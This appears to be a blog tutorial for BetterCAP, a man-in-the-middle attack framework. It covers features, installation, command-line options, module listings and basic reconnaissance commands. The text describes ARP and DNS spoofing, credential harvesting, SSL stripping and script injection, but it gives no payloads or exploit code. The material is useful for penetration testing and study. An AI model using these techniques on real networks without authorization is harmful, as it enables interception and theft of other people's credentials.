Powerful, Modular, Portable MITM Attack Framework
BetterCAP is a powerful, modular/flexible and portable MITM attack framework created to perform various types of attacks against a network. It is able to manipulate HTTP, HTTPS and TCP traffic in realtime, sniff for credentials, etc. It was completely reimplemented in 2018, and aside MITM it brings network monitoring 802.11, BLE and more. Penetration testers, reverse engineers and cybersecurity researchers may find this tool very useful.
The release of the second generation of BetterCAP, which has a complete re-implementation of the most complete and advanced Man-in-the-Middle attack framework, raises the MITM attacks to a whole new level. Also, BetterCAP aims to become a reference framework for network monitoring, 802.11, BLE attacks, etc.
Bettercap switched from a Ruby application to a compiled Go application, which allow BetterCAP 2.7.0 to run on low end hardware while proxying hundreds of connections per second and forwarding tens of hundred of packets. Memory and CPU usage are now extremely optimized and you can run several instances of your favorite MITM attack framework. BetterCAP supports Windows, macOS, Android, Linux (arm, mips, mips64, etc) and iOS.
Features:
- Full and half duplex ARP spoofing
- ICMP/DNS/NDP spoofing
- Modular HTTP and HTTPS transparent proxies with support for user plugins
- Realtime credentials harvesting for protocols such as HTTP(S) POSTed data, Basic and Digest Authentications, FTP, IRC, POP, IMAP, SMTP, NTLM ( HTTP, SMB, LDAP, etc.)
- Fully customizable sniffer
- Modular HTTP/HTTPS proxies to allow for injection of custom HTML, JS, CSS code or urls
- SSLStripping with HSTS bypass. etc.
New Features:
- single https certificate / authority fields can now be customized via dedicated module parameters ( http.server, https.proxy and api.rest )
- implemented any.proxy module to redirect traffic to custom proxy tools
- implemented http.proxy.injectjs and https.proxy.injectjs parameters to inject javascript code, files or URLs without a proxy module
Bettercap Caplets
Bettercap caplets, or .cap files are a powerful way to script bettercap’s interactive sessions, think about them as the .rc files of Metasploit. Check this repository for available caplets and modules. To execute:
$ sudo bettercap -caplet ./example.cap
BetterCap vs. EtterCAP
- EtterCAP worked good, but it’s very old tool and unstable on big networks
- Unlike BetterCAP, EtterCAP filters are very hard to implement (specific language implementation)
- EtterCAP doesn’t provide a builtin HTTP(S) and TCP transparent proxies, neither fully customizable credentials sniffer, etc.
Install BetterCAP
First, you need to make sure that you have a correctly configured Go >= 1.8 environment. $GOPATH/bin
needs to be in $PATH
. You also need to check if the libpcap-dev
and libnetfilter-queue-dev
are installed on your system. Install if missing:
$ sudo apt-get install libpcap-dev libnetfilter-queue-dev
Then download BetterCAP as follows:
$ go get github.com/bettercap/bettercap
After installation, install its dependencies, compile it and move the bettercap
executable to $GOPATH/bin
.
If you want to update to unstable release from repository, run:
$ go get -u github.com/bettercap/bettercap
Use sudo bettercap -h
to show the basic command line options.
$ bettercap --help Usage of ./bettercap_: -autostart string Comma separated list of modules to auto start. (default "events.stream, net.recon") -caplet string Read commands from this file and execute them in the interactive session. -cpu-profile file Write cpu profile file. -debug Print debug messages. -env-file string Load environment variables from this file if found, set to empty to disable environment persistence. -eval string Run one or more commands separated by ; in the interactive session, used to set variables via command line. -iface string Network interface to bind to, if empty the default interface will be auto selected. -mem-profile file Write memory profile to file. -no-colors Disable output color effects. -no-history Disable interactive session history file. -silent Suppress all logs which are not errors.
For legacy options check here.
Note: You might encounter issue like “error while loading shared libraries: libpcap.so.1: cannot open shared object file: No such file or directory
“, recommended solution:
$ sudo ln -s /usr/lib/x86_64-linux-gnu/libpcap.so.1.8.1 /usr/lib/libpcap.so.1
Basic commands:
help MODULE : List available commands or show module specific help if no module name is provided. active : Show information about active modules. quit : Close the session and exit. sleep SECONDS : Sleep for the given amount of seconds. get NAME : Get the value of variable NAME, use * alone for all, or NAME* as a wildcard. set NAME VALUE : Set the VALUE of variable NAME. read VARIABLE PROMPT : Show a PROMPT to ask the user for input that will be saved inside VARIABLE. clear : Clear the screen. include CAPLET : Load and run this caplet in the current session. ! COMMAND : Execute a shell command and print its output. alias MAC NAME : Assign an alias to a given endpoint given its MAC address.
Basic info & Commands
» net.show +----------------+--------------------+-----------------+---------------------------+---------+---------+------------+ | IP | MAC | Name | Vendor | Sent | Recvd | Last Seen | +----------------+--------------------+-----------------+---------------------------+---------+---------+------------+ | 192.168.xx.xx | a0:4e:xx:xx:xx:xx | eth0 | | 0 B | 0 B | 15:12:48 | | 192.168.xx.xx | ac:28:xx:xx:xx:xx | gateway | | 197 kB | 0 B | 15:12:49 | | | | | | | | | | 192.168.xx.xx | a8:20:xx:xx:xx:xx | 192.168.xx.xx | xx. | 29 MB | 18 MB | 19:29:11 | | 192.168.xx.xx | a0:37:xx:xx:xx:xx | unknown. | xx. | 1.4 MB | 383 kB | 19:27:50 | | 192.168.xx.xx | a0:49:xx:xx:xx:xx | workgroup. | xx. | 290 kB | 9.5 kB | 19:28:43 | | 192.168.xx.xx | a4:56:xx:xx:xx:xx | 192.168.xx.xx | | 4.6 kB | 0 B | 19:28:14 | | 192.168.xx.xx | a8:72:xx:xx:xx:xx | 192.168.xx.xx | xx. | 626 kB | 0 B | 19:28:23 | | 192.168.xx.xx | a8:62:xx:xx:xx:xx | 192.168.xx.xx | xx. | 69 kB | 11 kB | 19:28:29 | | 192.168.xx.xx | ac:18:xx:xx:xx:xx | 192.168.xx.xx | xx. | 0 B | 0 B | 15:12:49 | | 192.168.xx.xx | a4:2c:xx:xx:xx:xx | 192.168.xx.xx | xx. | 4.1 kB | 0 B | 18:39:24 | | 192.168.xx.xx | a8:37:xx:xx:xx:xx | 192.168.xx.xx | | 9.5 kB | 6.9 kB | 19:05:36 | | 192.168.xx.xx | a0:42:xx:xx:xx:xx | 192.168.xx.xx | xx. | 0 B | 0 B | 15:12:49 | | 192.168.xx.xx | a0:33:xx:xx:xx:xx | 192.168.xx.xx | xx. | 133 kB | 0 B | 19:28:22 | +----------------+--------------------+-----------------+---------------------------+---------+---------+------------+ *xx - redacted info
Use help to see which module is running:
» help
Modules any.proxy > not running (firewall redirection to any custom proxy) api.rest > not running (Expose a RESTful API) arp.spoof > running (Keep spoofing selected hosts on the network) ble.recon > not running (Bluetooth Low Energy devices discovery) dhcp6.spoof > running (Replies to DHCPv6 messages, providing victims with a link-local IPv6 address and setting the attackers host as default DNS server) dns.spoof > running (Replies to DNS messages with spoofed responses) events.stream > running (Print events as a continuous stream) gps > not running (talking with GPS hardware on a serial interface) http.proxy > not running (full featured HTTP proxy that can be used to inject malicious contents into webpages, all HTTP traffic will be redirected to it) http.server > not running (simple HTTP server, to be used to serve files and scripts accross the network) https.proxy > not running (full featured HTTPS proxy that can be used to inject malicious contents into webpages, all HTTPS traffic will be redirected to it) mac.changer > not running (change active interface mac address) mysql.server > not running (simple Rogue MySQL server, to be used to exploit LOCAL INFILE and read arbitrary files from the client) net.probe > running (actively search for hosts by sending UDP packets to every IP in the subnet) net.recon > not running (read ARP cache in order to monitor hosts on the network) net.sniff > not running (Sniff packets from the network) packet.proxy > not running (Linux only module that relies on NFQUEUEs to filter packets) syn.scan > not running (perform a syn prot scanning against an IP address within the provided ports range) tcp.proxy > not running (full featured TCP proxy and tunnel, all TCP traffic to a given remote address and port will be redir. to it) ticker > not running (execute one ore more commands every given amount of time) update > not running (check bettercap updates) wifi > not running (monitor and perform wireless attacks on 802.11) wol > not running (send Wake On Lan packets in breadcast or to specific MAC)
For specific module, run:
» help <module>
To get all info on all modules:
» get * any.proxy.dst_address: '<interface address>' any.proxy.dst_port: '8080' any.proxy.iface: '<interface name>' .... wifi.hop.period: '250' wifi.skip-broken: 'true' wifi.source.file: ''
To get all info on specific module:
» get dns.spoof.* dns.spoof.address: '<interface address>' dns.spoof.all: 'false' dns.spoof.domains: '*'
If you want to run commands right away (from the terminal):
$ bettercap -eval "net.probe.on; ticker on"
To run system commands within bettercap, add !
:
» !pwd
Conclusion
Things to work on:
- Experiment with different options, HTTPS, proxy
Bettercap is a versatile tool. Redirection, Phishing, Sniffing, Injections, .. you can do a lot with it. But there are some “problems”. Behaviour can vary because of the network architecture, DNS cache, setup.. Unexpected results can happen, especially to inexperienced users. It’s going to take you some time to overcome the problems and get use to the new environment. All in all, a solid tool that you should at least try. Check some examples on: